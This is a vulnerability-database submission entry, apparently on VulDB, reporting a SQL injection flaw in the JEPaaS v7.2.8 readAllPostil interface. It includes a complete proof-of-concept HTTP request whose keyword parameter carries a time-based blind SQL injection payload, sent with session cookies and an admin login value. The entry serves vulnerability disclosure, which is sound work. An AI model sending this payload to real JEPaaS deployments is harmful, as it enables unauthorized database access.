| タイトル | JEPaaS v7.2.8 SQL Injection |
|---|
| 説明 | https://github.com/c3p0ooo-Yiqiyin/JEPaaS-readAllPostil-SQL-Injection-Vulnerability/blob/main/README.md
The /je/postil/postil/readAllPostil interface in JEPaaS uses string concatenation in SQL statements, resulting in a SQL injection vulnerability
The request is as follows:
POST /je/postil/postil/readAllPostil?keyword=%25'+AND+IF(LENGTH(database())=6,SLEEP(2),0)+AND+'%25'%3d' HTTP/1.1
Host:
Cookie: je-local-lang=zh_CN; JSESSIONID=BDFF4DEC4216AE260303D79CBE35CA06; phone=admin; password=TVRJeg==; authorization=TIUxAb8r8IilqFzx9Xg
Content-Type: application/json; charset=utf-8
Content-Length: 2
{}
|
|---|
| ソース | ⚠️ https://github.com/c3p0ooo-Yiqiyin/JEPaaS-readAllPostil-SQL-Injection-Vulnerability/blob/main/README.md |
|---|
| ユーザー | c3p0ooo_Yiqiyin (UID 44113) |
|---|
| 送信 | 2025年12月05日 10:44 (5 月 ago) |
|---|
| モデレーション | 2025年12月14日 13:09 (9 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 336412 [ketr JEPaaS 迄 7.2.8 readAllPostil keyWord SQLインジェクション] |
|---|
| ポイント | 20 |
|---|